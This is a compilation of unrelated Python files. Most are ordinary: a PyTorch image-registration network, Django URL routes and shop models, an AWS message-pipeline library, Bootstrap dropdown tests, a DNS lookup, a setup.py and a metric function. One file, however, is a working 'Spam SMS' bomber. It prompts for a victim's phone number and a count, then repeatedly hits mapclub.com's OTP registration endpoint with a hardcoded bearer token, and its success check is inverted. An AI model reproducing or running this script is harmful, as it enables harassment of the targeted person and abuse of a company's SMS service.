self.conv3d13_1 = conv(128, 128, kernel_size=(3, 3, 3), stride=(1, 1, 1))
self.conv3d14 = deconv(128, 64, kernel_size=(3, 3, 3), stride=(2, 2, 2))
self.conv3d14_1 = conv(64, 64, kernel_size=(3, 3, 3), stride=(1, 1, 1))
self.conv3d15 = deconv(64, 32, kernel_size=(3, 3, 3), stride=(2, 2, 2))
self.conv3d15_1 = conv(32, 32, kernel_size=(3, 3, 3), stride=(1, 1, 1))
self.conv3d16 = nn.Conv3d(32, 3, 1, stride=(1, 1, 1))
self.conv2d9 = conv_2D(512*3, 512*2, kernel_size=3, stride=1)
self.conv2d10 = deconv_2D(512*2, 512, kernel_size=3, stride=2)
self.conv2d10_1 = conv_2D(512, 512, kernel_size=3, stride=1)
self.conv2d11 = deconv_2D(512, 256, kernel_size=3, stride=2)
self.conv2d11_1 = conv_2D(256, 256, kernel_size=3, stride=1)
self.conv2d12 = deconv_2D(256, 128, kernel_size=3, stride=2)
self.conv2d12_1 = conv_2D(128, 128, kernel_size=3, stride=1)
self.conv2d13 = deconv_2D(128, 64, kernel_size=3, stride=2)
self.conv2d13_1 = conv_2D(64, 64, kernel_size=3, stride=1)
self.conv3d17 = conv(1, 2, 3, stride=(1, 1, 1))
self.conv3d18 = nn.Conv3d(2, 2, 1,stride=(1, 1, 1))
def forward(self, x_sa, x_saed, x_2ch, x_2ched, x_4ch, x_4ched):
# x: source image; x_pred: target image;
net = {}
net['conv0_sa'] = x_sa
net['conv0_sa_ed'] = x_saed
net['conv0_2ch'] = x_2ch
net['conv0_2ch_ed'] = x_2ched
net['conv0_4ch'] = x_4ch
net['conv0_4ch_ed'] = x_4ched
# 5 refers to 5 output or 5 blocks
for i in range(5):
net['conv%d_sa' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_sa' % i])
net['conv%d_sa_ed' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_sa_ed' % i])
net['conv%d_2ch' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_2ch' % i])
net['conv%d_2ch_ed' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_2ch_ed' % i])
net['conv%d_4ch' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_4ch' % i])
net['conv%d_4ch_ed' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_4ch_ed' % i])
net['concat%d_sa' % (i + 1)] = torch.cat((net['conv%d_sa' % (i + 1)], net['conv%d_sa_ed' % (i + 1)]), 1)
net['concat%d_2ch' % (i + 1)] = torch.cat((net['conv%d_2ch' % (i + 1)], net['conv%d_2ch_ed' % (i + 1)]), 1)
net['concat%d_4ch' % (i + 1)] = torch.cat((net['conv%d_4ch' % (i + 1)], net['conv%d_4ch_ed' % (i + 1)]), 1)
net['out%d_sa' % (i + 1)] = self.conv_list_2D[i](net['concat%d_sa' % (i + 1)])
net['out%d_2ch' % (i + 1)] = self.conv_list_2D[i](net['concat%d_2ch' % (i + 1)])
net['out%d_4ch' % (i + 1)] = self.conv_list_2D[i](net['concat%d_4ch' % (i + 1)])
if i > 0:
# upsample DHW dimension
net['out%d_sa_up' % (i + 1)] = F.interpolate(net['out%d_sa' % (i + 1)], scale_factor=2 ** i, mode='bilinear', align_corners=True)
net['out%d_2ch_up' % (i + 1)] = F.interpolate(net['out%d_2ch' % (i + 1)], scale_factor=2 ** i, mode='bilinear', align_corners=True)
net['out%d_4ch_up' % (i + 1)] = F.interpolate(net['out%d_4ch' % (i + 1)], scale_factor=2 ** i, mode='bilinear', align_corners=True)
# output: net['out1_sa'], net['out2_sa_up'], net['out3_sa_up'], net['out4_sa_up'], net['out5_sa_up'] are used for multiscale fusion
net['concat_sa'] = torch.cat((net['out1_sa'], net['out2_sa_up'], net['out3_sa_up'], net['out4_sa_up'], net['out5_sa_up']), 1)
net['concat_2ch'] = torch.cat((net['out1_2ch'], net['out2_2ch_up'], net['out3_2ch_up'], net['out4_2ch_up'], net['out5_2ch_up']), 1)
net['concat_4ch'] = torch.cat((net['out1_4ch'], net['out2_4ch_up'], net['out3_4ch_up'], net['out4_4ch_up'], net['out5_4ch_up']), 1)
net['concat'] = torch.cat((net['concat_sa'], net['concat_2ch'], net['concat_4ch']),1)
net['comb_1'] = self.conv6(net['concat'])
net['comb_2'] = self.conv7(net['comb_1'])
net['conv3d0f'] = net['comb_2'].unsqueeze(1)
net['conv3d_1'] = self.conv3d9(net['conv3d0f'])
net['conv3d_2'] = self.conv3d10_1(self.conv3d10(net['conv3d_1']))
net['conv3d_3'] = self.conv3d11_1(self.conv3d11(net['conv3d_2']))
net['conv3d_4'] = self.conv3d12_1(self.conv3d12(net['conv3d_3']))
net['conv3d_5'] = self.conv3d13_1(self.conv3d13(net['conv3d_4']))
net['conv3d_6'] = self.conv3d14_1(self.conv3d14(net['conv3d_5']))
net['conv3d_7'] = self.conv3d15_1(self.conv3d15(net['conv3d_6']))
net['out'] = torch.tanh(self.conv3d16(net['conv3d_7']))
# Estimate mesh
net['concat_edge_ed'] = torch.cat((net['conv5_sa_ed'], net['conv5_2ch_ed'], net['conv5_4ch_ed']), 1)
net['conv2d_0_ed'] = self.conv2d9(net['concat_edge_ed'])
net['conv2d_1_ed'] = self.conv2d10_1(self.conv2d10(net['conv2d_0_ed']))
net['conv2d_2_ed'] = self.conv2d11_1(self.conv2d11(net['conv2d_1_ed']))
net['conv2d_3_ed'] = self.conv2d12_1(self.conv2d12(net['conv2d_2_ed']))
net['conv2d_4_ed'] = self.conv2d13_1(self.conv2d13(net['conv2d_3_ed']))
net['conv3d_edge_ed'] = net['conv2d_4_ed'].unsqueeze(1)
net['out_edge_ed'] = self.conv3d18(self.conv3d17(net['conv3d_edge_ed']))
net['concat_edge'] = torch.cat((net['conv5_sa'], net['conv5_2ch'], net['conv5_4ch']), 1)
net['conv2d_0'] = self.conv2d9(net['concat_edge'])
net['conv2d_1'] = self.conv2d10_1(self.conv2d10(net['conv2d_0']))
net['conv2d_2'] = self.conv2d11_1(self.conv2d11(net['conv2d_1']))
net['conv2d_3'] = self.conv2d12_1(self.conv2d12(net['conv2d_2']))
net['conv2d_4'] = self.conv2d13_1(self.conv2d13(net['conv2d_3']))
net['conv3d_edge'] = net['conv2d_4'].unsqueeze(1)
net['out_edge'] = self.conv3d18(self.conv3d17(net['conv3d_edge']))
return net
class Mesh_2d(nn.Module):
"""Deformable registration network with input from image space """
def __init__(self, n_ch=1):
super(Mesh_2d, self).__init__()
self.conv1 = conv_2D(n_ch, 32)
self.conv2 = conv_2D(32, 64)
def forward(self, x_2ch, x_2ched, x_4ch, x_4ched):
# x: source image; x_pred: target image;
net = {}
net['conv1_2ch'] = self.conv1(x_2ch)
net['conv1_4ch'] = self.conv1(x_4ch)
net['conv1s_2ch'] = self.conv1(x_2ched)
net['conv1s_4ch'] = self.conv1(x_4ched)
net['conv2_2ch'] = self.conv2(net['conv1_2ch'])
net['conv2_4ch'] = self.conv2(net['conv1_4ch'])
net['conv2s_2ch'] = self.conv2(net['conv1s_2ch'])
net['conv2s_4ch'] = self.conv2(net['conv1s_4ch'])
return net
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns(
'',
url(r'^$|^sync', 'cal.views.home', name='home'),
url(r'^admin/', include(admin.site.urls)),
url(r'^admin/', include('loginas.urls')),
url(r'^admin/generate-categories', 'cal.views.generate_categories',
name='generate_categories'),
url(r'^logout$', 'cal.views.logout_view', name='logout_view'),
url(r'^auth/google', 'cal.views.google_auth', name='google_auth'),
url(r'^auth/clear', 'cal.views.clear_auth', name='clear_auth'),
url(r'^complete-with-token/(?P<backend>[^/]+)/$',
'cal.views.complete_with_token', name='complete_with_token'),
url(r'^accounts/profile', 'cal.views.accounts_profile', name='accounts_profile'),
# Django REST framework
url(r'^', include('api.urls')),
# Python social auth
url('', include('social.apps.django_app.urls', namespace='social')),
)
|
"""
Defines components.
- PipelineComponent: receive message from a queue, publishes to a topic
- SourceComponent: generates data somehow (e.g. external fetch), publishes to a topic
- SinkComponent: receive messages, do not publish anything
- NullComponent: does not receive or publish anything
"""
import typing
import contextlib
import copy
import itertools
import functools
from . import aws
from .models.messages import BaseMessage, ObjectType, IngestionMessage
from .models.ingestion import IngestionStep
from .models.data import DataAsset
from .interfaces.messaging import MessageProducer, MessageConsumer, NoMessagesAvailable, MessageTooLarge, MessageStore
from .interfaces.entrypoint import Entrypoint
from .io import FolderMessageProducerConsumer
from .utils import logging
from .utils import timed, catchAllExceptionsToLog
class Component(Entrypoint):
@timed('total')
@catchAllExceptionsToLog
def runOnce(self):
"""
Process a single message
"""
logging.info('heartbeat: run_once')
if self._hasInput:
try:
with self.inputMessageProducer.getMessage() as message:
self._runOnce(message)
except NoMessagesAvailable:
pass
else:
self._runOnce(None)
def lambda_handler(self, event, context):
logging.info('heartbeat: lambda_handler')
if self._hasInput:
self.inputMessageProducer = aws.lambda_.PseudoQueue(event)
while len(self.inputMessageProducer) > 0:
self.runOnce(PYLON_ALLOW_EXCEPTIONS=True)
else:
self.runOnce(PYLON_ALLOW_EXCEPTIONS=True)
def _runOnce(self, message: BaseMessage):
ingestionStep = self._getIngestionStep(message)
logging.updateLogger(
ingestionId=ingestionStep.ingestionId, logFormat=self.config['PYLON_LOG_FORMAT'],
logLevel=self.config['PYLON_LOG_LEVEL']
)
logging.info({
'message': 'heartbeat: core_process',
'parentIngestionId': str(ingestionStep.parentIngestionId)
})
results = self._processInput(message=message)
if self._hasOutput:
if results is not None:
self._processOutput(results, ingestionStep)
else:
logging.warning(f'Component did not produce any output')
# add duration time to ingestionStep
ingestionStep.updateMetadata({'durationSeconds': self.coreFunction.durationSeconds})
logging.info(f'INGESTION_STEP: {ingestionStep.toJSON()}')
logging.tearDownLogging(
logFormat=self.config['PYLON_LOG_FORMAT'], logLevel=self.config['PYLON_LOG_LEVEL']
)
def _processInput(self, message):
if message is not None and message.isCheckedIn():
message = _retrieveMessageBody(message)
results = self.coreFunction(message, self.config)
return results
def _processOutput(self, results, ingestionStep):
if not isinstance(results, typing.Iterable):
results = [results]
results = (
_storeMessageBody(_populateMessageAttributes(msg, ingestionStep), self.config)
for msg in results
if msg is not None
)
self._sendMessages(results)
def _getIngestionStep(self, message: BaseMessage):
ingestionStep = IngestionStep()
parentIngestionId = message.ingestionId if message is not None else None
ingestionStep.populate(config=self.config, parentIngestionId=parentIngestionId)
return ingestionStep
def _sendMessages(self, messages: typing.Iterable[BaseMessage]):
if messages is not None:
messages = (message for message in messages if message is not None)
try:
self.outputMessageConsumer.sendMessages(messages)
except MessageTooLarge:
raise MessageTooLarge(
'Failed to send message because it is too large. Try using '
'PYLON_STORE_DESTINATION and PYLON_STORE_MIN_MESSAGE_BYTES to store the body'
'of large messages before sending them.'
)
def _getInputFromConfig(self) -> MessageProducer:
inp = self.config['PYLON_INPUT']
if inp.startswith('sqs://'):
return aws.sqs.Queue(inp[6:])
if inp.startswith('folder://'):
return FolderMessageProducerConsumer(inp[9:])
raise NotImplementedError(f"Unsupported input {self.config['PYLON_INPUT']}")
def _getOutputFromConfig(self) -> MessageConsumer:
output = self.config['PYLON_OUTPUT']
if output.startswith('sns://'):
return aws.sns.Topic(output[6:])
if output.startswith('sqs://'):
return aws.sqs.Queue(output[6:])
if output.startswith('folder://'):
return FolderMessageProducerConsumer(output[9:])
raise NotImplementedError(f"Unsupported output {self.config['PYLON_OUTPUT']}")
@property
def _hasInput(self):
try:
return self.inputMessageProducer is not None
except AttributeError:
return False
@property
def _hasOutput(self):
try:
return self.outputMessageConsumer is not None
except AttributeError:
return False
class PipelineComponent(Component):
"""
A component that receives an input message, and generates one or more output
messages. This is typically a step in a data pipeline, such as transforming
data.
Use this class to decorate a function to provide plumbing to input queues,
output topics and ingestion boilerplate.
Usage:
```
@PipelineComponent
def myWorkflow(
message: BaseMessage,
config: dict
) -> typing.Union[BaseMessage, typing.Iterable[BaseMessage]]:
# do something with the message
# add something interesting to the ingestion step
# return some results
pass
if __name__ == '__main__':
myWorkflow.runForever()
```
"""
def makeAdapters(self):
self.inputMessageProducer = self._getInputFromConfig()
self.outputMessageConsumer = self._getOutputFromConfig()
class SourceComponent(Component):
"""
A component that generates output messages, but does not consume any input
messages. This is the "source" of a pipeline, typically a fetcher that
downloads data from a supplier triggered by an external scheduler. Often used in combination
with the config variable `PYLON_LOOP_SLEEP_SECONDS` which defines the number of seconds between
calls to the function decorated by `@SourceComponent`.
Use this class to decorate a function to provide plumbing to output topics
and ingestion boilerplate.
Usage:
```
@SourceComponent
def myWorkflow(
message: BaseMessage
config: dict
) -> typing.Union[BaseMessage, typing.Iterable[BaseMessage]]:
# do something with the message
# add something interesting to the ingestion step
# return some results
pass
if __name__ == '__main__':
myWorkflow.runOnce()
```
"""
def makeAdapters(self):
self.outputMessageConsumer = self._getOutputFromConfig()
class SinkComponent(Component):
"""
A component that receives an input message, but does not produce any output
messages.
Use this class to decorate a function to provide plumbing to input queues.
Usage:
```
@SinkComponent
def myWorkflow(
message: BaseMessage,
config: dict
) -> None:
# do something with the message
# add something interesting to the ingestion step
pass
if __name__ == '__main__':
myWorkflow.runForever()
```
"""
def makeAdapters(self):
self.inputMessageProducer = self._getInputFromConfig()
class NullComponent(Component):
"""
A component that generates no output messages, and does not consume any input
messages. This is a weird component useful for running things on a timer in ECS. Often used in
combination with the config variable `PYLON_LOOP_SLEEP_SECONDS` which defines the number of
seconds between calls to the function decorated by `@SourceComponent`.
Usage:
```
@NullComponent
def myWorkflow(
message: BaseMessage,
config: dict,
) -> None:
del message
# do something interesting
pass
if __name__ == '__main__':
myWorkflow.runForever()
```
"""
pass
def _populateMessageAttributes(
message: BaseMessage,
ingestionStep: IngestionStep
):
message = copy.deepcopy(message)
# set ingestionId and some relevant information from it to all messages
message.ingestionId = ingestionStep.ingestionId
message.artifactName = ingestionStep.artifactName
message.artifactVersion = ingestionStep.artifactVersion
# double happiness if data asset
# 囍
if message.objectType == ObjectType.DATA_ASSET:
message.body.ingestionId = ingestionStep.ingestionId
for row in message.body.data:
row['ingestion_id'] = ingestionStep.ingestionId
return message
def _getStoreFromConfig(config: dict) -> MessageStore:
storeDestination = config.get('PYLON_STORE_DESTINATION')
if storeDestination is None:
return None
if storeDestination.startswith('s3://'):
return aws.s3.MessageStore(storeDestination)
raise NotImplementedError(f"Unsupported message store {config['PYLON_STORE_DESTINATION']}")
def _storeMessageBody(message: BaseMessage, config: dict) -> BaseMessage:
if message.isCheckedIn():
logging.debug('Message is already checked in, not checking in again.')
return message
store = _getStoreFromConfig(config)
min_body_size_bytes = config.get('PYLON_STORE_MIN_MESSAGE_BYTES')
if (
store is not None and
min_body_size_bytes is not None and
message.getApproxSize() >= min_body_size_bytes
):
logging.info('Message too large, checking message in.')
return store.checkInPayload(message)
return message
def _retrieveMessageBody(message: BaseMessage) -> BaseMessage:
if not message.isCheckedIn():
raise ValueError('message is not checked in anywhere???')
if message.payloadStoreKey.startswith('s3://'):
message = aws.s3.MessageStore.checkOutPayload(message)
else:
# how did they make the message????!?!
raise NotImplementedError(f"Unsupported message store for {message.payloadStoreKey}")
# Load message body from json if applicable
# This usually happens in decode but didn't because the message body only available now
if message.objectType == ObjectType.DATA_ASSET:
message.body = DataAsset.fromJSON(message.body)
if message.objectType == ObjectType.INGESTION_STEP:
message.body = IngestionStep.fromJSON(message.body)
return message
|
import requests
import json
import os
import time
from requests import post
os.system("clear")
os.system("figlet Zendot-H")
time.sleep(1)
banner="""
\t Spam SMS
--------------------------------------
[+]Author: Zendot-H
[+]Github: https://github.com/Zaeni123
----------------------------------------
"""
print(banner)
nomor=input("Masukkan Nomor Target(08): ")
jumlah=int(input("Jumlah: "))
print()
headers={
"Host":"beryllium.mapclub.com",
"content-length":"24",
"client-platform":"WEB",
"client-timestamp":"1629017047573",
"authorization":"Bearer eyJhbGciOiJIUzUxMiJ9.eyJndWVzdENvZGUiOiIzMmVmODZjMy01YmNjLTRiMjUtOWIyOC02Njg3YmQ5Y2MwNWQiLCJleHBpcmVkIjoxNjI5MDIwNjE3MzM1LCJleHBpcmUiOjM2MDAsImV4cCI6MTYyOTAyMDYxNywiaWF0IjoxNjI5MDE3MDE3LCJwbGF0Zm9ybSI6IldFQJ9.1jcjv77xteNP2EpxsiC6d5SIHYKBQHo_hMMDFuOLr4s2M_9r5V0RLjNLz0SVq-SdzJIo2kLhvsNXgm0OGjf91g",
"accept":"application/json, text/plain, */*",
"content-type":"application/json",
"accept-language":"en-US",
"user-agent":"Mozilla/5.0 (Linux; Android 7.1.1; SM-J250F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Mobile Safari/537.36",
"save-data":"on",
"origin":"https://www.mapclub.com",
"sec-fetch-site":"same-site",
"sec-fetch-mode":"cors",
"sec-fetch-dest":"empty",
"referer":"https://www.mapclub.com/",
"accept-encoding":"gzip, deflate, br",
}
data={
"msisdn":nomor,
}
for i in range(int(jumlah)):
respon=requests.post("https://beryllium.mapclub.com/api/sms/otp/registration",headers=headers,json=data)
zen=json.loads(respon.text)
if zen["success"]==False:
print('Spam sms sukses')
else:
print("Spam sms gagal!!") |
def test_example():
"""Stub test."""
|
from markyp_html.inline import a
from markyp_bootstrap4.buttons import ButtonContext
from markyp_bootstrap4.dropdowns import *
def test_DropdownButtonFactory():
contexts = (
ButtonContext.PRIMARY, ButtonContext.SECONDARY, ButtonContext.SUCCESS,
ButtonContext.DANGER, ButtonContext.WARNING, ButtonContext.INFO,
ButtonContext.LIGHT, ButtonContext.DARK, ButtonContext.LINK
)
factory = DropdownButtonFactory()
assert factory.create_element().markup == '<button ></button>'
for context in contexts:
assert factory.create_element(class_=factory.get_css_class(context), **factory.update_attributes({})).markup ==\
f'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-{context} dropdown-toggle"></button>'
assert factory.create_element("Value", class_=factory.get_css_class(context), **factory.update_attributes({})).markup ==\
f'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-{context} dropdown-toggle">Value</button>'
def test_dropdown_button():
assert dropdown_button.primary("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-primary dropdown-toggle">Value</button>'
assert dropdown_button.primary("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-primary dropdown-toggle my-btn">Value</button>'
assert dropdown_button.primary_outline("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-primary dropdown-toggle">Value</button>'
assert dropdown_button.primary_outline("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-primary dropdown-toggle my-btn">Value</button>'
assert dropdown_button.secondary("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-secondary dropdown-toggle">Value</button>'
assert dropdown_button.secondary("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-secondary dropdown-toggle my-btn">Value</button>'
assert dropdown_button.secondary_outline("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-secondary dropdown-toggle">Value</button>'
assert dropdown_button.secondary_outline("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-secondary dropdown-toggle my-btn">Value</button>'
assert dropdown_button.success("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-success dropdown-toggle">Value</button>'
assert dropdown_button.success("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-success dropdown-toggle my-btn">Value</button>'
assert dropdown_button.success_outline("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-success dropdown-toggle">Value</button>'
assert dropdown_button.success_outline("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-success dropdown-toggle my-btn">Value</button>'
assert dropdown_button.danger("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-danger dropdown-toggle">Value</button>'
assert dropdown_button.danger("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-danger dropdown-toggle my-btn">Value</button>'
assert dropdown_button.danger_outline("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-danger dropdown-toggle">Value</button>'
assert dropdown_button.danger_outline("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-danger dropdown-toggle my-btn">Value</button>'
assert dropdown_button.warning("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-warning dropdown-toggle">Value</button>'
assert dropdown_button.warning("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-warning dropdown-toggle my-btn">Value</button>'
assert dropdown_button.warning_outline("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-warning dropdown-toggle">Value</button>'
assert dropdown_button.warning_outline("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-warning dropdown-toggle my-btn">Value</button>'
assert dropdown_button.info("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-info dropdown-toggle">Value</button>'
assert dropdown_button.info("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-info dropdown-toggle my-btn">Value</button>'
assert dropdown_button.info_outline("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-info dropdown-toggle">Value</button>'
assert dropdown_button.info_outline("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-info dropdown-toggle my-btn">Value</button>'
assert dropdown_button.light("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-light dropdown-toggle">Value</button>'
assert dropdown_button.light("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-light dropdown-toggle my-btn">Value</button>'
assert dropdown_button.light_outline("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-light dropdown-toggle">Value</button>'
assert dropdown_button.light_outline("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-light dropdown-toggle my-btn">Value</button>'
assert dropdown_button.dark("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-dark dropdown-toggle">Value</button>'
assert dropdown_button.dark("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-dark dropdown-toggle my-btn">Value</button>'
assert dropdown_button.dark_outline("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-dark dropdown-toggle">Value</button>'
assert dropdown_button.dark_outline("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-dark dropdown-toggle my-btn">Value</button>'
assert dropdown_button.link("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-link dropdown-toggle">Value</button>'
assert dropdown_button.link("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-link dropdown-toggle my-btn">Value</button>'
assert dropdown_button.link_outline("Value").markup ==\
'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-link dropdown-toggle">Value</button>'
assert dropdown_button.link_outline("Value", class_="my-btn", attr=42).markup ==\
'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-outline-link dropdown-toggle my-btn">Value</button>'
def test_menu_header():
assert menu_header.h1("Value").markup == '<h1 class="dropdown-header">Value</h1>'
assert menu_header.h1("Value", class_="my-header", attr=42).markup == '<h1 attr="42" class="dropdown-header my-header">Value</h1>'
assert menu_header.h2("Value").markup == '<h2 class="dropdown-header">Value</h2>'
assert menu_header.h2("Value", class_="my-header", attr=42).markup == '<h2 attr="42" class="dropdown-header my-header">Value</h2>'
assert menu_header.h3("Value").markup == '<h3 class="dropdown-header">Value</h3>'
assert menu_header.h3("Value", class_="my-header", attr=42).markup == '<h3 attr="42" class="dropdown-header my-header">Value</h3>'
assert menu_header.h4("Value").markup == '<h4 class="dropdown-header">Value</h4>'
assert menu_header.h4("Value", class_="my-header", attr=42).markup == '<h4 attr="42" class="dropdown-header my-header">Value</h4>'
assert menu_header.h5("Value").markup == '<h5 class="dropdown-header">Value</h5>'
assert menu_header.h5("Value", class_="my-header", attr=42).markup == '<h5 attr="42" class="dropdown-header my-header">Value</h5>'
assert menu_header.h6("Value").markup == '<h6 class="dropdown-header">Value</h6>'
assert menu_header.h6("Value", class_="my-header", attr=42).markup == '<h6 attr="42" class="dropdown-header my-header">Value</h6>'
assert menu_header.p("Value").markup == '<p class="dropdown-header">Value</p>'
assert menu_header.p("Value", class_="my-header", attr=42).markup == '<p attr="42" class="dropdown-header my-header">Value</p>'
def test_dropdown():
assert dropdown().markup ==\
'<div class="dropdown"></div>'
assert dropdown("First", "Second", class_="my-dd", attr=42).markup ==\
'<div attr="42" class="dropdown my-dd">\nFirst\nSecond\n</div>'
def test_menu():
assert menu(button_id="button1").markup ==\
'<div aria-labelledby="button1" class="dropdown-menu"></div>'
assert menu("First", "Second", button_id="button1", class_="my-menu", attr=42).markup ==\
'<div attr="42" aria-labelledby="button1" class="dropdown-menu my-menu">\nFirst\nSecond\n</div>'
def test_menu_divider():
assert menu_divider().markup ==\
'<div class="dropdown-divider"></div>'
assert menu_divider(class_="my-divider", attr=42).markup ==\
'<div attr="42" class="dropdown-divider my-divider"></div>'
def test_menu_item():
assert menu_item().markup ==\
'<button type="button" class="dropdown-item"></button>'
assert menu_item("Label").markup ==\
'<button type="button" class="dropdown-item">Label</button>'
assert menu_item("Label", class_="my-item").markup ==\
'<button type="button" class="dropdown-item my-item">Label</button>'
assert menu_item("Label", active=True, class_="my-item").markup ==\
'<button type="button" class="dropdown-item active my-item">Label</button>'
assert menu_item("Label", class_="my-item", disabled=True).markup ==\
'<button type="button" class="dropdown-item disabled my-item">Label</button>'
assert menu_item("Label", active=True, class_="my-item", disabled=True).markup ==\
'<button type="button" class="dropdown-item active disabled my-item">Label</button>'
assert menu_item("Label", active=True, class_="my-item", attr=42).markup ==\
'<button type="button" attr="42" class="dropdown-item active my-item">Label</button>'
assert menu_item("Label", active=True, class_="my-item", attr=42, factory=a).markup ==\
'<a type="button" attr="42" class="dropdown-item active my-item">Label</a>'
|
from django.db import models
from django.contrib.auth.models import AbstractUser
from utils.BaseModel import BaseModel
class User(AbstractUser, BaseModel):
"""
用户模型类
"""
image = models.ImageField(upload_to="user_image", verbose_name="用户头像")
class Meta:
db_table = "shop_user"
verbose_name = "用户"
verbose_name_plural = verbose_name
class Address(BaseModel):
"""
用户地址模型类
"""
user = models.ForeignKey('User', on_delete=models.CASCADE, verbose_name="所属账户") # on_delete=models.CASCADE 删除关联数据,与之关联也删除
receiver = models.CharField(max_length=20, verbose_name="收件人")
phone = models.CharField(max_length=11, verbose_name="手机号码")
addr = models.CharField(max_length=30, verbose_name="收件地址")
zip_code = models.CharField(max_length=6, default="000000", verbose_name="邮编")
is_default = models.BooleanField(default=False, verbose_name="是否默认")
class Meta:
db_table = "shop_address"
verbose_name = "地址"
verbose_name_plural = verbose_name
def __str__(self):
return self.addr
|
import dns.resolver
import json
def test_lookup(request):
svc = request.args.get('svc')
if svc:
return lookup(svc)
return 'svc arg not provided'
def lookup(name):
answers = dns.resolver.query(f'_run._tcp.{name}.svc.local.', 'SRV')
if answers:
print(f'found answers {answers} for name: {name}')
return f'host: {answers[0].target} port: {answers[0].port}'
else:
print(f'no answers found for {name}')
return None
|
from setuptools import setup
setup(
name='upstream_wpt_webhook',
version='0.1.0',
author='The Servo Project Developers',
url='https://github.com/servo-automation/upstream-wpt-sync-webhook/',
description='A service that upstreams local changes to web-platform-tests',
packages=['upstream_wpt_webhook'],
install_requires=[
'flask',
'requests',
],
entry_points={
'console_scripts': [
'upstream_wpt_webhook=upstream_wpt_webhook.hook:start',
],
},
zip_safe=False,
)
|
# -*- coding: utf-8 -*-
"""
create on 2021-01-30 15:41
author @66492
"""
import numpy as np
def accuracy(y_true: np.ndarray, y_hat: np.ndarray):
y_true = y_true.reshape(-1, )
y_hat = y_hat.reshape(-1, )
return (y_true == y_hat).sum() / y_true.shape[0]
|
from contextlib import suppress
